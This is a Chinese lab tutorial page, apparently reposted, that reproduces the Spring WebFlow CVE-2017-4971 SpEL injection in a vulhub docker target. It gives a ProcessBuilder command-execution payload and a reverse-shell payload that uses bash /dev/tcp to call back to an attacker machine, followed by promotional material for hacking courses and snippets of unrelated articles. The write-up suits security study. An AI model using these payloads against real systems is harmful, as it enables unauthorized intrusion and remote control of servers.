news 2026/6/26 8:48:50

小白_程序员速看!Spring WebFlow CVE-2017-4971远程代码执行漏洞复现

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
小白_程序员速看!Spring WebFlow CVE-2017-4971远程代码执行漏洞复现

小白/程序员速看!Spring WebFlow CVE-2017-4971远程代码执行漏洞复现

本文围绕Spring WebFlow CVE-2017-4971远程代码执行漏洞展开,讲解其原理、实验环境搭建与完整复现步骤,涵盖靶机启动、抓包修改POC执行命令、反弹shell等实操内容,帮助网安小白及程序员掌握该漏洞利用方法,加深对Spring框架安全的认知。

免责声明:严格禁止对任何未授权系统/网络进行扫描、攻击或入侵。 禁止制作/传播恶意程序,禁止参与任何网络犯罪。如擅自将本文实验技术用于非法用途,一切法律后果及责任由行为人独立承担,与作者无关。

Spring WebFlow 远程代码执行漏洞(CVE-2017-4971)

实验目的

通过本实验,掌握Spring WebFlow 远程代码执行漏洞原理和利用方法,加深了解Spring WebFlow框架。

实验环境

·操作机:Win10
用户名:Administrator
密码:Sangfor!7890

·操作机:kali
用户名:root
密码:Sangfor!7890

·靶机:Ubuntu + docker
用户名:root
密码:Sangfor!7890

·实验地址:http://ip:8080/login

实验原理

由于Spring的框架越来越多,而且后面引入了SpringEl作为默认的表达式解析方式,所以一旦引入了类似于OGNL的表达式,很可能会带来一些安全问题。本次漏洞就是由于Spring WebFlow是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

漏洞介绍
该漏洞在2017年5月31号被提交到https://pivotal.io/security/cve-2017-4971平台,官方并没有详细的信息,通过官方描述和补丁的对比,我们可以大致推断应该是Spring WebFlow在Model的数据绑定上面,由于没有明确指定相关model的具体属性导致从表单可以提交恶意的表达式从而被执行,导致任意代码执行的漏洞,这个漏洞利用除了版本的限制之外还有两个前置条件,这两个前置条件中有一个是默认配置,另外一个就是编码规范了,漏洞能不能利用成功主要就取决于后面的条件。

实验步骤

第一步启动目标靶机的环境

1、登录"Spring WebFlow"靶机,执行如下命令,进入目标环境所在目录

cd /vulhub-master

cd spring

cd CVE-2017-4971

2、执行以下命令,运行目标靶机的环境

docker-compose up -d

3、登录“Attack”操作机,打开浏览器,访问http://靶机ip:8080,看到酒店预订页面,说明靶机环境启动成功

第二步漏洞复现

4、通过“Attack”操作机的浏览器访问http://靶机ip:8080,看到登录页面

5、用页面左边给出的任意一个账号/密码登录网站

6、访问id为1的酒店http://靶机ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步WebFlow就正式开始了)

7、打开桌面的的“Burp”文件夹,双击“BURP.cmd”启动Burp Suite抓包工具

8、切换到“Proxy”代理模块的“Options”,查看Bp的代理

9、切换到浏览器,选择火狐插件中的代理(配置浏览器的的代理),与Bp的代理一致

10、点击确认“Confirm”按钮,确认酒店预订信息,Bp成功抓取数据包,然后将数据包send to repeater

11、修改数据包,加入要执行的代码,然后发送数据包,会返回500的状态码(注意:一定要URL编码,即new+java.lang.ProcessBuilder)

创建文件POC

_(new java.lang.ProcessBuilder(“touch”,“/tmp/success”)).start()=sy

验证文件是否创建成功

12、进入靶机服务器,在docker靶机里可以看到已经在/tmp目录下成功创建了success文件(注意:是进入docker里)
,执行如下命令

docker ps 查看靶机环境对应的docker容器ID

docker exec -it 容器ID bash 进入docker环境

cd /tmp 进入tmp目录

ls 查看文件

反弹shell

13、首先在kali输入以下命令来监听端口

nc -l -p 21

14、修改数据包,输入POC【_(new java.lang.ProcessBuilder(“bash”,“-c”,“bash -i >& /dev/tcp/【kali攻击机ip】/21 0>&1”)).start()=sy】反弹shell

15、获得shell,可以执行系统命令

实验总结

通过本实验,对Spring WebFlow框架进行远程代码执行,成功向服务器写入文件,并执行相关命令反弹shell,深入了解远程代码执行漏洞的危害。

互动话题:如果你对网络攻防技术感兴趣,想学习更多网安方面的知识和工具,可以看看以下题外话!

题外话

黑客/网络安全学习路线

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

下面给大家分享一份2026最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!

一、2026最新网络安全学习路线

一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 *(安全链接,放心点击)

我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。

L1级别:网络安全的基础入门

L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。

L2级别:网络安全的技术进阶

L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。

L3级别:网络安全的高阶提升

L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。

L4级别:网络安全的项目实战

L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。

二、技术文档和经典PDF书籍

书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)

三、网络安全视频教程

对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

四、网络安全护网行动/CTF比赛

学以致用,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。

五、网络安全工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

面试不仅是技术的较量,更需要充分的准备。

在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。

如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…


**读者福利 |***CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 *(安全链接,放心点击)

文章来自网上,侵权请联系博主

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/26 8:47:40

精准量化脂代谢核心指标! 甘油三酯(TG)检测试剂盒

内容概要甘油三酯是生物体内最主要的脂类储能分子,也是细胞膜合成与能量代谢的重要底物;血清甘油三酯水平是临床血脂检测的核心常规指标,组织与细胞内的甘油三酯含量则直接反映脂代谢的稳态状态,与肥胖、非酒精性脂肪肝、动脉粥样…

作者头像 李华
网站建设 2026/6/26 8:43:30

3步轻松获取百度网盘真实下载地址:告别限速的终极指南

3步轻松获取百度网盘真实下载地址:告别限速的终极指南 【免费下载链接】baidu-wangpan-parse 获取百度网盘分享文件的下载地址 项目地址: https://gitcode.com/gh_mirrors/ba/baidu-wangpan-parse 你是否厌倦了百度网盘那令人抓狂的100KB/s下载限制&#xff…

作者头像 李华
网站建设 2026/6/26 8:42:11

5步快速上手XUnity.AutoTranslator:让外语游戏秒变中文

5步快速上手XUnity.AutoTranslator:让外语游戏秒变中文 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator 还在为看不懂的日文游戏剧情而烦恼?是否因为语言障碍而错过了许多优秀的独立…

作者头像 李华